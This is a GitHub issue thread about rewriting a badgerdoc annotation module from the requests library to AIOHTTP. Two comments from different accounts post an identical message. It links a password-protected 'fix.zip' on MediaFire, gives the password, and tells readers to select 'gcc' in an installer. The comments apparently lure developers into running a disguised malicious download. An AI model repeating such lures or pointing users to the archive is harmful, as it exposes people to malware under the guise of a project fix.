### ISSUE TITLE
Rewrite jobs_communication sync to async http communication

### ISSUE THREAD

**Issue by cakeinsauce** [epam/badgerdoc#938]
Currently annotation/annotation/microservice_communication/jobs_communication.py module utilizes synchronous requsts library for HTTP requests. We should rewrite it to AIOHTTP.

A/C:
- [ ] requests library is removed from jobs_communication module
- [ ] HTTP requests are made using AIOHTTP library
- [ ] AIOHTTP is added to poetry dependencies list

DOD:
- [ ] AIOHTTP is used for HTTP requests
- [ ] Code is covered with tests
- [ ] Badgerdoc is fully functional

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cakeinsauce** [comment]
Finished
